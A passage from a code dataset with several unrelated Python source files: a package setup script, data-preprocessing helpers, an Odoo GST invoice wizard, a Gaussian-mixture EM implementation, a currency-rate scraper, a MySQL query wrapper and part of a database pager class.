Tool for High-throughput Optical\nDensity Experiments (GATHODE) to analyse this survival.\"\"\"\n\n else:\n raise RuntimeError('no such app \"'+app+'\"')\n\n return genericSetupOpts\n\ndef setupPackage():\n genericSetupOpts=genericSetupDict()\n setup(\n entry_points = {\n 'console_scripts': [\n 'gathodecli = platereader.odcli:odCommandlineInterface',\n 'cathodecli = platereader.clscli:clsCommandlineInterface',\n ],\n 'gui_scripts': [\n 'gathode = platereader.odgui:gui_main',\n 'cathode = platereader.clsgui:clsgui_main',\n ]\n },\n **genericSetupOpts\n )\n\ndef setupOsXapp(app):\n setupOpts=genericSetupDict(app)\n setupOpts['options']={\n 'py2app': { 'argv_emulation': True },\n 'plist': {},\n }\n if app == 'GATHODE':\n setupOpts['app']=['platereader/odgui.py']\n elif app == 'CATHODE':\n setupOpts['app']=['platereader/clsgui.py']\n setup(\n **setupOpts\n )\n\nif __name__ == \"__main__\":\n if len(sys.argv)<=1 or sys.argv[1] == 'version':\n print(getVersion())\n elif len(sys.argv)>1 and sys.argv[1] == 'py2app':\n app='GATHODE'\n if len(sys.argv) > 2:\n app=sys.argv.pop()\n setupOsXapp(app)\n else:\n setupPackage()\n","repo_name":"platereader/gathode","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4912,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"24967126273","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.preprocessing import LabelEncoder\nfrom imblearn.under_sampling import RandomUnderSampler\n\n\n\ndef make_stt_weight(df):\n \"\"\"\n Add STT_weight field fucntion\n variable_dic : key = 'hour' value = that hour counts\n\n weight : hour counts / all data counts (list)\n \"\"\"\n variable_dic = {}\n weight = []\n\n # make variable dictionary\n for i in range(len(df.STT_HOUR.value_counts().index)):\n variable_dic[str(df.STT_HOUR.value_counts().index[i])] = df.STT_HOUR.value_counts().values[i]\n\n for hour in df.STT_HOUR.values:\n weight.append(variable_dic[str(hour)] / len(df))\n\n df['STT_weight'] = weight\n\n return df\n\n\ndef make_stt_hour(df):\n \"\"\"\n Add STT_HOUR field function\n \"\"\"\n hours = []\n\n for i in range(len(df)):\n index = df.STT.values[i].index(':')\n hours.append(int(df.STT.values[i][:index]))\n\n df['STT_HOUR'] = hours\n\n return df\n\n\ndef make_stt_term(df):\n \"\"\"\n Add STT_term field function\n \"\"\"\n time_term = []\n\n for i in range(len(df)):\n hour = df.STT_HOUR.values[i]\n if 0 <= hour < 7:\n time_term.append(\"dawn\")\n elif 7 <= hour < 12:\n time_term.append(\"morning\")\n elif 12 <= hour < 16:\n time_term.append('afternoon')\n elif 16 <= hour < 20:\n time_term.append(\"peak\")\n else:\n time_term.append(\"evening\")\n\n return df\n\n\ndef make_quaruter(df):\n \"\"\"\n Add QUARTER field function\n \"\"\"\n quarters = []\n\n for i in range(len(df)):\n if df[\"SDT_MM\"][i] in (1, 2, 3):\n quarters.append(\"First\")\n elif df[\"SDT_MM\"][i] in (4, 5, 6):\n quarters.append(\"Second\")\n elif df[\"SDT_MM\"][i] in (7, 8, 9):\n quarters.append(\"Third\")\n else:\n quarters.append(\"Fourth\")\n\n df[\"QUARTER\"] = quarters\n\n return df\n\n\ndef make_one_hot_field(df, features):\n \"\"\"\n categrical field(nominal) apply one-hot encoding.\n Add Dummy variable (one-hot)\n \"\"\"\n for feature in features:\n oec = OneHotEncoder()\n X = oec.fit_transform(df[feature].values.reshape(-1, 1)).toarray()\n df_onehot = pd.DataFrame(X, columns=[feature + \"_\" + str(int(i)) for i in range(X.shape[1])])\n df = pd.concat([df, df_onehot], axis=1)\n\n return df\n\n\ndef drop_field(df, features):\n \"\"\"\n Drop fields\n \"\"\"\n df = df.drop(features, axis=1)\n \n return df\n\n\ndef label_encoding(df, features):\n \"\"\"\n ordinal field apply label encoding.\n Input features convert to label field\n :param df: input data frame\n :param features: to convert to label field\n :return: None\n \"\"\"\n for feature in features:\n label_encoder = LabelEncoder()\n df[feature] = label_encoder.fit_transform(df[feature])\n\n return df\n\ndef under_sampling(df):\n \"\"\"\n Using Random Sampling\n \"\"\"\n\n rus = RandomUnderSampler(return_indices=True)\n X_tl, y_tl, id_tl = rus.fit_sample(df, df['DLY'])\n\n # remake data frame.\n columns = df.columns\n df = pd.DataFrame(X_tl, columns=columns)\n # df = df.astype(float)\n\n return df\n","repo_name":"NDjust/Bigcon_airport","sub_path":"function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13789092203","text":"# -*- coding: utf-8 -*-\nfrom odoo import api, models\n\n\nclass WizardInvoiceGST(models.TransientModel):\n _name = \"wizard.gst.invoice\"\n\n def get_invoice_line(self, get_invoice_line, obj_invoice_line, gst_invoice_obj, invoice_type):\n invoice_line_data = []\n invoice_line_data_json = {}\n amount_taxed = 0.0\n rate = 0.0\n amt_rate = 0.0\n currency = gst_invoice_obj.currency_id or None\n price = obj_invoice_line.price_subtotal / obj_invoice_line.quantity if obj_invoice_line.quantity > 0 else 0.0\n obj_rate = obj_invoice_line.tax_ids\n if obj_rate:\n for obj_rate in obj_rate:\n if obj_rate.amount_type == \"group\":\n for childObj in obj_rate.children_tax_ids:\n rate = childObj.amount * 2\n invoice_line_data.append(rate)\n break\n else:\n rate = obj_rate.amount\n invoice_line_data.append(rate)\n break\n computed_tax_amount = self.env['wizard.tax.gst'].compute_taxed_amount(\n obj_rate, price, currency, obj_invoice_line, gst_invoice_obj)\n amt_rate = computed_tax_amount[1]\n amt_rate = round(amt_rate, 2)\n amount_taxed = computed_tax_amount[0]\n invoice_line_data_json = self.env['wizard.tax.gst'].gst_tax_data(\n gst_invoice_obj, obj_invoice_line, obj_rate, amount_taxed, invoice_type)\n else:\n amt_rate = obj_invoice_line.price_subtotal\n amt_rate = amt_rate\n if currency.name != 'INR':\n amt_rate = amt_rate * currency.rate\n amt_rate = round(amt_rate, 2)\n invoice_line_data.append(0)\n invoice_line_data_json = self.env['wizard.tax.gst'].gst_tax_data(\n gst_invoice_obj, obj_invoice_line, False, amount_taxed, invoice_type)\n data = get_invoice_line + invoice_line_data\n return [data, invoice_line_data_json, rate, amt_rate]\n\n def get_gst_invoice_lines(self, gst_invoice_obj, invoice_type, data, gst_return_type=''):\n data_json = []\n count = 0\n get_rate_data = {}\n rate_data = {}\n get_rate_data_json = {}\n check_itc_eligible = 'Ineligible'\n context = dict(self._context or {})\n if gst_return_type == 'gstr2':\n if context.get('gst_id'):\n res_id = context.get('gst_id')\n current_obj = self.env['gst.return.tool'].browse(res_id)\n check_itc_eligible = current_obj.avail_itc_eligible\n if check_itc_eligible == 'Ineligible':\n check_itc_eligible = gst_invoice_obj.avail_itc_eligible\n for obj_invoice_line in gst_invoice_obj.invoice_line_ids:\n if obj_invoice_line.product_id:\n if obj_invoice_line.product_id.type == 'service':\n if invoice_type == 'impg':\n continue\n else:\n if invoice_type == 'imps':\n continue\n else:\n if invoice_type == 'impg':\n continue\n get_invoice_line = self.get_invoice_line(data, obj_invoice_line, gst_invoice_obj, invoice_type)\n if get_invoice_line:\n rate = get_invoice_line[2]\n amt_rate = get_invoice_line[3]\n if get_invoice_line[1]:\n get_invoice_line[1]['tax_value'] = amt_rate\n if gst_return_type == 'gstr2':\n igst = get_invoice_line[1].get('gst_round_amt') or 0.0\n cgst = get_invoice_line[1].get('cgst_amt') or 0.0\n sgst = get_invoice_line[1].get('sgst_amt') or 0.0\n if rate not in rate_data.keys():\n get_rate_data[rate] = {\n 'taxval': amt_rate,\n 'igst': igst,\n 'cgst': cgst,\n 'sgst': sgst,\n 'cess': 0.0\n }\n else:\n get_rate_data[rate]['taxval'] = get_rate_data[rate]['taxval'] + amt_rate\n get_rate_data[rate]['igst'] = get_rate_data[rate]['igst'] + igst\n get_rate_data[rate]['cgst'] = get_rate_data[rate]['cgst'] + cgst\n get_rate_data[rate]['sgst'] = get_rate_data[rate]['sgst'] + sgst\n get_rate_data[rate]['cess'] = get_rate_data[rate]['cess'] + 0.0\n if gst_return_type == 'gstr1':\n if rate not in rate_data.keys():\n get_rate_data[rate] = {\n 'taxval': amt_rate,\n 'cess': 0.0\n }\n else:\n get_rate_data[rate]['taxval'] = get_rate_data[rate]['taxval'] + amt_rate\n get_rate_data[rate]['cess'] = get_rate_data[rate]['cess'] + 0.0\n if rate not in get_rate_data_json.keys():\n get_rate_data_json[rate] = get_invoice_line[1]\n else:\n for key in get_invoice_line[1].keys():\n if key in ['gst_amt', 'supply_state', 'typ', 'itc_eligibility']:\n continue\n if get_rate_data_json[rate].get(key):\n get_rate_data_json[rate][key] = get_rate_data_json[rate][key] + get_invoice_line[1][key]\n get_rate_data_json[rate][key] = round(get_rate_data_json[rate][key], 2)\n else:\n get_rate_data_json[rate][key] = get_invoice_line[1][key]\n invoice_line = []\n if gst_return_type == 'gstr1':\n invoice_line = get_invoice_line[0] + [get_rate_data[rate]['taxval']]\n if gst_return_type == 'gstr2':\n if invoice_type in ['imps', 'impg']:\n invoice_line = get_invoice_line[0] + \\\n [get_rate_data[rate]['taxval'],\n get_rate_data[rate]['igst']\n ]\n else:\n invoice_line = get_invoice_line[0] + [\n get_rate_data[rate]['taxval'],\n get_rate_data[rate]['igst'],\n get_rate_data[rate]['cgst'],\n get_rate_data[rate]['sgst']\n ]\n if invoice_type == 'b2b':\n if gst_return_type == 'gstr1':\n invoice_line = invoice_line + [0.0]\n if gst_return_type == 'gstr2':\n if check_itc_eligible != 'Ineligible':\n invoice_line = invoice_line + [0.0] + [check_itc_eligible] + [\n get_rate_data[rate]['igst']\n ] + [get_rate_data[rate]['cgst']] + [\n get_rate_data[rate]['sgst']\n ] + [get_rate_data[rate]['cess']]\n else:\n invoice_line = invoice_line + [0.0] + [check_itc_eligible] + [0.0] * 4\n\n elif invoice_type == 'b2bur':\n if check_itc_eligible != 'Ineligible':\n invoice_line = invoice_line + [0.0] + [check_itc_eligible] + [\n get_rate_data[rate]['igst']\n ] + [get_rate_data[rate]['cgst']] + [\n get_rate_data[rate]['sgst']\n ] + [get_rate_data[rate]['cess']]\n else:\n invoice_line = invoice_line + [0.0] + [check_itc_eligible] + [0.0] * 4\n elif invoice_type in ['imps', 'impg']:\n if check_itc_eligible != 'Ineligible':\n invoice_line = invoice_line + [0.0] + [check_itc_eligible] + [\n get_rate_data[rate]['igst']\n ] + [get_rate_data[rate]['cess']]\n else:\n invoice_line = invoice_line + [0.0] + [check_itc_eligible] + [0.0] + [0.0]\n elif invoice_type in ['b2cs', 'b2cl']:\n invoice_line = invoice_line + [0.0, '']\n if invoice_type == 'b2cl':\n bonded_wh = 'Y' if gst_invoice_obj.l10n_in_export_type == 'sale_bonded' else 'N'\n invoice_line = invoice_line + [bonded_wh]\n rate_data[rate] = invoice_line\n import_data = rate_data.values()\n if get_rate_data_json:\n for json_data in get_rate_data_json.values():\n count = count + 1\n if invoice_type == 'b2b' and gst_return_type == 'gstr2':\n data_json.append({\n \"num\": count,\n 'itm_det': json_data,\n \"itc\": {\n \"itc_eligibility\": \"no\",\n \"tax_invoice\": 0.0,\n \"tx_s\": 0.0,\n \"tx_c\": 0.0,\n \"tax_cess\": 0.0\n }\n })\n elif invoice_type == 'b2bur':\n data_json.append({\n \"num\": count,\n 'itm_det': json_data,\n \"itc\": {\n \"itc_eligibility\": \"no\",\n \"tax_invoice\": 0.0,\n \"tx_s\": 0.0,\n \"tx_c\": 0.0,\n \"tax_cess\": 0.0\n }\n })\n elif invoice_type in ['imps', 'impg']:\n data_json.append({\n \"num\": count,\n 'itm_det': json_data,\n \"itc\": {\n \"itc_eligibility\": \"no\",\n \"tax_invoice\": 0.0,\n \"tax_cess\": 0.0\n }\n })\n else:\n data_json.append({\"num\": count, 'itm_det': json_data})\n return [import_data, data_json, get_rate_data, get_rate_data_json]\n\n","repo_name":"planetodooofficial/slc_gst_tds_rewrite","sub_path":"slc_gst_tds_rewrite/wizard/gst_invoice_wizard.py","file_name":"gst_invoice_wizard.py","file_ext":"py","file_size_in_byte":10497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"70818549948","text":"\"\"\"\nDescription:\n this is the module provides EM algorithm for GMM.\n\n\"\"\"\n\n# Futures\nfrom __future__ import print_function\n\nimport os\nimport copy\nfrom scipy.stats import norm\nfrom Code.Modules.Data_Generation import *\nfrom Code.Modules.utils import *\n\nsys.path.append('..')\n\n# Built-in/Generic Imports\n\n__author__ = '{Chao ZHOU}'\n__copyright__ = 'Copyright {04/02/2020}, {EM algorithm study}'\n__email__ = '{chaozhouucl@gmail.com}'\n__status__ = '{dev_status}'\n\n\n# {code}\ndef main():\n # ------------------------------------------------------------------------------------------------------------------\n # define project path\n # ------------------------------------------------------------------------------------------------------------------\n project_path = os.path.abspath(os.path.join(os.path.join(os.getcwd(), '..'), '..')) + '/'\n\n # ------------------------------------------------------------------------------------------------------------------\n # generate synthetic data and visualize them\n # ------------------------------------------------------------------------------------------------------------------\n # GMM data generation\n NO_DATA = 100000\n True_dist_param = {'gaussian1_params': {'gaussian_param_1_mean': 10,\n 'gaussian_param_1_scale': 10},\n 'gaussian2_params': {'gaussian_param_2_mean': 40,\n 'gaussian_param_2_scale': 6, },\n 'mix_coef': [0.3, 0.7]}\n x = gmm_data_generation(NO_DATA, True_dist_param)\n\n # GMM data visualization\n data_path = project_path + 'Data/GMM/'\n write_data(x, file_path=data_path + 'GMM_Samples.pkl')\n plt.plot(x, np.zeros(shape=x.shape))\n plt.savefig(data_path + 'visualization of data.png', format='png')\n plt.close()\n\n # ------------------------------------------------------------------------------------------------------------------\n # initialize a GMM model with known number of cluster=2\n # ------------------------------------------------------------------------------------------------------------------\n NO_cluster = 2\n init_Mix_coef = np.asarray([0.5, 0.5])\n init_gaussain1_param = {'gaussian1_mean': 1, 'guassian1_var': 3}\n init_gaussain2_param = {'gaussian2_mean': 50, 'guassian2_var': 3, }\n init_respons = np.zeros(shape=(NO_DATA, NO_cluster))\n\n new_Mix_coef = copy.deepcopy(init_Mix_coef)\n old_Mix_coef = copy.deepcopy(init_Mix_coef)\n\n new_gaussain1_param = copy.deepcopy(init_gaussain1_param)\n old_gaussain1_param = copy.deepcopy(init_gaussain1_param)\n\n new_gaussain2_param = copy.deepcopy(init_gaussain2_param)\n old_gaussain2_param = copy.deepcopy(init_gaussain2_param)\n\n new_respons = copy.deepcopy(init_respons)\n old_respons = copy.deepcopy(init_respons)\n\n # ------------------------------------------------------------------------------------------------------------------\n # run EM for 10 times\n # ------------------------------------------------------------------------------------------------------------------\n for i in range(10):\n new_respons = EM_E(x, new_respons, new_gaussain1_param, new_gaussain2_param, new_Mix_coef)\n new_gaussain1_param, new_gaussain2_param, new_Mix_coef = EM_M(x, new_respons, new_gaussain1_param,\n\n new_gaussain2_param, new_Mix_coef)\n est__dist_param = {'gaussian1_params': new_gaussain1_param,\n 'gaussian2_params': new_gaussain2_param,\n 'mix_coef': new_Mix_coef\n }\n results_path = project_path + 'Results/GMM/'\n write_data(True_dist_param, file_path=results_path + 'True_dist_params.pkl')\n write_data(est__dist_param, file_path=results_path + 'Est_dist_params.pkl')\n\n\n# E-step\ndef EM_E(x, new_respons, new_gaussain1_param, new_gaussain2_param, new_Mix_coef):\n NO_cluster = len(new_Mix_coef)\n old_respons = copy.deepcopy(new_respons)\n gaussian1 = norm(loc=new_gaussain1_param['gaussian1_mean'],\n scale=new_gaussain1_param['guassian1_var'])\n gaussian2 = norm(loc=new_gaussain2_param['gaussian2_mean'],\n scale=new_gaussain2_param['guassian2_var'])\n gaussian_mixture = [gaussian1, gaussian2]\n for k in range(NO_cluster):\n pi = new_Mix_coef[k]\n gaussian_pdf = gaussian_mixture[k].pdf(x)\n new_respons[:, k] = pi * gaussian_pdf\n\n new_respons = new_respons / np.sum(new_respons, axis=1, keepdims=True)\n print('new respons:\\r\\n')\n print(new_respons)\n return new_respons\n\n\n# M-Step\ndef EM_M(x, new_respons, new_gaussain1_param, new_gaussain2_param, new_Mix_coef):\n NO_DATA = len(x)\n old_gaussain1_param = copy.deepcopy(new_gaussain1_param)\n old_gaussain2_param = copy.deepcopy(new_gaussain2_param)\n old_Mix_coef = copy.deepcopy(new_Mix_coef)\n\n new_Mix_coef = np.sum(new_respons, axis=0, keepdims=True) / NO_DATA\n new_Mix_coef = np.squeeze(new_Mix_coef)\n\n new_gaussain1_param['gaussian1_mean'] = np.dot(new_respons[:, 0].T, x) / np.sum(new_respons[:, 0], axis=0)\n new_gaussain2_param['gaussian2_mean'] = np.dot(new_respons[:, 1].T, x) / np.sum(new_respons[:, 1], axis=0)\n\n new_gaussain1_param['guassian1_var'] = np.sqrt(np.dot(new_respons[:, 0].T,\n np.power(x - new_gaussain1_param['gaussian1_mean'],\n 2)) / \\\n np.sum(new_respons[:, 0], axis=0))\n new_gaussain2_param['guassian2_var'] = np.sqrt(np.dot(new_respons[:, 1].T,\n np.power(x - new_gaussain2_param['gaussian2_mean'],\n 2)) / \\\n np.sum(new_respons[:, 1], axis=0))\n print('new mix coeff:\\r\\n')\n print(new_Mix_coef)\n\n print('new gaussian1 params:\\r\\n')\n print(new_gaussain1_param)\n\n print('new gaussian2 params:\\r\\n')\n print(new_gaussain2_param)\n return new_gaussain1_param, new_gaussain2_param, new_Mix_coef\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ChaoEdisonZhouUCL/GMM-and-EM","sub_path":"Code/GMM/GMM.py","file_name":"GMM.py","file_ext":"py","file_size_in_byte":6276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"16696460342","text":"from bs4 import BeautifulSoup\nimport csv\nimport lxml\nimport requests\n\nURL = 'https://valuta.kg/'\n\ndef get_html(url):\n r = requests.get(url)\n return r.text\n\ndef get_content(html):\n soup = BeautifulSoup(html, 'html.parser') \n items = soup.find('div', class_='rate-list active').find('table', class_='vl-list').find_all('td', class_='td-rate')\n rate_sales = []\n rate =[]\n\n \n for item in items:\n div_= item.find('div', class_='td-rate__wrp').text\n rate_sales.append(div_.replace('\\n', '').replace(' ', '').replace('-', ''))\n \n for item in rate_sales[:8]:\n rate.append(item)\n\n return rate\n\nhtml = get_html(URL)\nvaluta = get_content(html)\n","repo_name":"0murbekov/ExchengePortal","sub_path":"parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"40125359551","text":"# -*- coding: utf-8 -*-\nimport os\nimport MySQLdb\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.exc import IntegrityError\nimport pandas as pd\nimport traceback\nimport logging\n\nfrom tools.settings import *\nfrom tools.utility import datetime2str\n\n\nMYSQL_CONF = PROJECT_CONFIG['mysql_rule360_alert']\n\n\nclass MysqlQueryBase():\n def __init__(self):\n self.mysql_con = None\n self.sqlalchemy_con = None\n\n def _init_mysql_connection(self):\n self.mysql_con = MySQLdb.connect(host=MYSQL_CONF['host'], # your host, usually localhost\n user=MYSQL_CONF['username'], # your username\n passwd=MYSQL_CONF['password'], # your password\n db=MYSQL_CONF['defaultdb']) # name of the data base\n\n def _init_sqlalchemy_mysql_connection(self, defaultDB=None):\n db = defaultDB if defaultDB is not None else MYSQL_CONF['defaultdb']\n self.sqlalchemy_con = create_engine('mysql://{}:{}@{}/{}'.format(MYSQL_CONF['username'],\n MYSQL_CONF['password'],\n MYSQL_CONF['host'],\n db))\n\n def _close_all_mysql_connection(self):\n if self.mysql_con is not None:\n self.mysql_con.close()\n if self.sqlalchemy_con is not None:\n self.sqlalchemy_con.dispose()\n\n def query_sample(self):\n self._init_mysql_connection()\n sql = \"\"\"\n SELECT '1';\n \"\"\"\n df = pd.read_sql(sql=sql, con=self.mysql_con)\n self._close_all_mysql_connection()\n return df\n\n def query(self, queryString, logString=''):\n logger_.debug('[mysql] Start query {}, sql=\\n{}'.format(logString, queryString))\n self._init_mysql_connection()\n try:\n df = pd.read_sql(sql=queryString, con=self.mysql_con)\n logger_.debug('[mysql] Finish query {}, len(df)={}'.format(logString, len(df)))\n self._close_all_mysql_connection()\n return df\n except Exception as e:\n traceback.print_exc()\n logger_.error(\"[mysql] Exception in query {}, e.message={}\".format(logString, e.message))\n self.mysql_con.rollback()\n self._close_all_mysql_connection()\n return None\n\n def execute(self, sqlString, logString='', muteLog=False):\n if not muteLog:\n logger_.debug('[mysql] Start execute {}, sql=\\n{}'.format(logString, sqlString))\n self._init_mysql_connection()\n try:\n cursor = self.mysql_con.cursor()\n result = cursor.execute(sqlString)\n self.mysql_con.commit()\n if not muteLog:\n logger_.debug('[mysql] Finish execute {}, result={}'.format(logString, result))\n self._close_all_mysql_connection()\n return True\n except Exception as e:\n traceback.print_exc()\n logger_.error(\"[mysql] Exception in execute {}, e.message={}\".format(logString, e.message))\n self.mysql_con.rollback()\n self._close_all_mysql_connection()\n return False\n\n def updateByID(self, table, col_id, val_id, col_update_ts, **update_params):\n setList = []\n for key, value in update_params.iteritems():\n setList.append(' {}=\"{}\" '.format(key, value))\n sql = '''\n update {table} set {col_update_ts}='{now_ts}', {set_vals} where {col_id}='{val_id}'\n '''.format(table=table, col_update_ts=col_update_ts, now_ts=datetime2str(datetime.now(tz=TIMEZONE)), set_vals=','.join(setList), col_id=col_id, val_id=val_id)\n logger_.debug('[mysql] Start update {}, sql=\\n{}'.format(table, sql))\n self._init_mysql_connection()\n try:\n cursor = self.mysql_con.cursor()\n result = cursor.execute(sql)\n self.mysql_con.commit()\n logger_.debug('[mysql] Finish update {}, result={}'.format(table, result))\n self._close_all_mysql_connection()\n return True\n except Exception as e:\n traceback.print_exc()\n logger_.error(\"[mysql] Exception in update {}, e.message={}\".format(table, e.message))\n self.mysql_con.rollback()\n self._close_all_mysql_connection()\n return False\n pass\n\n def insertDF(self, df, tableName, dbName=None, logString=''):\n logger_.debug('[mysql] Start insert df into {}.{}, {}'.format(dbName, tableName, logString))\n self._init_sqlalchemy_mysql_connection(dbName)\n try:\n df.to_sql(name=tableName, con=self.sqlalchemy_con, if_exists='append', index=False)\n self._close_all_mysql_connection()\n return df\n except IntegrityError as e:\n traceback.print_exc()\n self._close_all_mysql_connection()\n logger_.error('[mysql] IntegrityError in insert df into {}.{}, e={}'.format(dbName, tableName, e))\n except Exception as e:\n traceback.print_exc()\n self._close_all_mysql_connection()\n logger_.error(\"[mysql] Exception in insert df into {}.{}, e={}\".format(dbName, tableName, e))\n\n\n# singleton\nmysql_query_instance = MysqlQueryBase()\n","repo_name":"Ernestyj/PyProj","sub_path":"PyProjectTemplate/scheduler/mysql_query/mysql_query_base.py","file_name":"mysql_query_base.py","file_ext":"py","file_size_in_byte":5351,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"25328479354","text":"import logging\nimport fcntl\nimport os.path\nimport sys\n\nfrom typing import Tuple\n\nfrom .constants import (\n TABLE_MAX_PAGES,\n PAGE_SIZE,\n EXIT_FAILURE,\n FILE_HEADER_OFFSET,\n FILE_HEADER_SIZE,\n FILE_PAGE_AREA_OFFSET,\n FILE_HEADER_VERSION_FIELD_SIZE,\n FILE_HEADER_VERSION_FIELD_OFFSET,\n FILE_HEADER_NEXT_FREE_PAGE_HEAD_SIZE,\n FILE_HEADER_NEXT_FREE_PAGE_HEAD_OFFSET,\n FREE_PAGE_NEXT_FREE_PAGE_HEAD_OFFSET,\n FREE_PAGE_NEXT_FREE_PAGE_HEAD_SIZE,\n FILE_HEADER_HAS_FREE_PAGE_LIST_OFFSET,\n FILE_HEADER_HAS_FREE_PAGE_LIST_SIZE,\n FREE_PAGE_HAS_NEXT_FREE_PAGE_HEAD_OFFSET,\n FREE_PAGE_HAS_NEXT_FREE_PAGE_HEAD_SIZE,\n FILE_HEADER_VERSION_VALUE,\n NULLPTR,\n)\n\n\nclass InvalidPageAccess(Exception):\n pass\n\n\nclass DatabaseFileExclusiveLockNotAvailable(Exception):\n \"\"\"Unable to obtain exclusive lock on database file\"\"\"\n\n pass\n\n\nclass Pager:\n \"\"\"\n Manages pages in memory (cache) and on file.\n\n The pager provides page abstraction on top of the file's byte stream.\n From the pager's perspective, the pager sees the file organized like:\n file_header, page_0, page_1, ... page_N-1.\n\n Page allocation is thus:\n - when pages are returned, they are kept in a list (in-memory)\n - when the db is shutdown, the free pages are persisted on disk\n via a singly linked list. The head of this list is stored in the\n file header. Each free page contains the page num of the next free\n page.\n - if a new page is requested, it should be sourced\n in the following order:\n - in memory list of free pages\n - on disk list of free pages\n - end of file (by increasing file by a page size)\n \"\"\"\n\n def __init__(self, filename: str):\n self.header = None\n self.pages = [None for _ in range(TABLE_MAX_PAGES)]\n self.filename = filename\n self.fileptr = None\n self.file_length = 0\n # num of actual pages\n # at startup, this equals the number of pages on disk; once the pager is running\n # it's the number of pages in memory\n self.num_pages = 0\n # number of pages on disk\n self.num_pages_on_disk = 0\n # the next free page num to alloc - should monotonically increase\n self.next_allocatable_page_num = 0\n self.returned_pages = []\n # linked list of free pages\n # whether free page list is set\n self.has_free_page_list = False\n # head node page num\n self.free_page_list_head = NULLPTR\n self.init()\n\n @classmethod\n def pager_open(cls, filename):\n \"\"\"\n Create pager on argument file\n \"\"\"\n return cls(filename)\n\n def get_unused_page_num(self) -> int:\n \"\"\"\n NOTE: this depends on num_pages being updated when a new page is requested\n # todo: rename get_free_page_num\n :return:\n \"\"\"\n # first check the on-memory page cache\n if len(self.returned_pages):\n return self.returned_pages.pop()\n\n # check the on-disk free list\n if self.has_free_page_list:\n head_page_num = self.free_page_list_head\n page = self.get_page(head_page_num)\n has_next_page, next_page_num = self.get_free_page_next(page)\n if has_next_page:\n # set current next as free list head\n self.free_page_list_head = next_page_num\n self.has_free_page_list = True\n else:\n self.has_free_page_list = False\n\n return head_page_num\n\n # allocate at end of file\n free_page_num = self.next_allocatable_page_num\n # once allocated, incr page num to avoid double allocation\n self.next_allocatable_page_num += 1\n return free_page_num\n\n def page_exists(self, page_num: int) -> bool:\n \"\"\"\n\n :param page_num: does this page exist/ has been allocated\n :return:\n \"\"\"\n # num_pages counts whole pages\n return page_num < self.num_pages\n\n def get_page(self, page_num: int) -> bytearray:\n \"\"\"\n get `page` given `page_num`\n \"\"\"\n if page_num >= TABLE_MAX_PAGES:\n raise InvalidPageAccess(\n f\"Tried to fetch page out of bounds (requested page = {page_num}, max pages = {TABLE_MAX_PAGES})\"\n )\n\n if self.pages[page_num] is None:\n # cache miss. Allocate memory and load from file.\n page = bytearray(PAGE_SIZE)\n\n # determine number of pages in file; there should only be complete pages\n if page_num < self.num_pages:\n # this page exists on file, load from file\n # into `page`\n self.fileptr.seek(FILE_PAGE_AREA_OFFSET + page_num * PAGE_SIZE)\n read_page = self.fileptr.read(PAGE_SIZE)\n assert (\n len(read_page) == PAGE_SIZE\n ), \"corrupt file: read page returned byte array smaller than page\"\n page[:PAGE_SIZE] = read_page\n\n self.pages[page_num] = page\n\n if page_num >= self.num_pages:\n self.num_pages = page_num + 1\n\n if self.next_allocatable_page_num < self.num_pages:\n # next alloc must be at end of file and monotonically increasing\n self.next_allocatable_page_num = self.num_pages\n\n return self.pages[page_num]\n\n def return_page(self, page_num: int):\n \"\"\"\n\n :param page_num:\n :return:\n \"\"\"\n self.returned_pages.append(page_num)\n\n def truncate_file(self):\n \"\"\"\n Check if there are any to-be recycled pages in memory at\n tail of the file. If so truncate file and remove page.\n :return:\n \"\"\"\n if not self.returned_pages or self.file_length == 0:\n \"\"\"\n no in-memory pages, no-op\n \"\"\"\n return\n self.returned_pages.sort()\n page_num = self.returned_pages[-1]\n while page_num:\n # check if: 1) is tail page and 2) is on disk\n if (\n page_num == self.num_pages - 1\n and page_num == self.num_pages_on_disk - 1\n ):\n # truncate file\n self.file_length -= PAGE_SIZE\n assert self.file_length >= 0, f\"invalid file length {self.file_length}\"\n self.fileptr.truncate(self.file_length)\n self.num_pages -= 1\n self.num_pages_on_disk -= 1\n self.returned_pages.pop()\n\n page_num = (\n self.returned_pages[-1] if len(self.returned_pages) > 0 else None\n )\n else:\n break\n\n def close(self):\n \"\"\"\n close the pager. flush header and pages to file\n \"\"\"\n # 1. check and truncate file\n self.truncate_file()\n\n # 2. add pages to on-disk free list\n # current on disk head will become tail of returned page\n # i.e. iteratively prepend to list and at the end update the header\n head_is_defined = self.has_free_page_list\n head = self.free_page_list_head\n while self.returned_pages:\n # 2.1. get free page\n free_page_num = self.returned_pages.pop()\n free_page = self.get_page(free_page_num)\n if head_is_defined:\n # head is defined; set head asset next\n self.set_free_page_next(free_page, head)\n else:\n # head is not defined\n self.set_free_page_next_null(free_page)\n head_is_defined = True\n\n # flush free pages since they contain the next free page pointer\n self.flush_page(free_page_num)\n head = free_page_num\n\n # 3. update header with free list head\n self.set_free_page_head(self.header, head)\n # flush updated header\n self.flush_header()\n\n # 4. flush in-use pages\n # pages are 0-based\n for free_page_num in range(self.num_pages):\n if self.pages[free_page_num] is None:\n continue\n self.flush_page(free_page_num)\n\n # 5. release exclusive lock on file\n fcntl.lockf(self.fileptr, fcntl.LOCK_UN)\n\n # 6. close file\n self.fileptr.close()\n\n # section: internal API\n\n def init(self):\n \"\"\"\n Initialize pager. This includes:\n - open database file\n - read file header and get next free page\n - set state vars like num_pages (in file), file length etc.\n - warm up pager cache, by loading pages into dis\n \"\"\"\n # open binary file such that: it is readable, not truncated(random),\n # create if not exists, writable(random)\n # a+b (and more generally any \"a\") mode can only write to end\n # of file; seeks only applies to read ops\n # r+b allows read and write, without truncation, but errors if\n # the file does not exist\n # NB: this sets 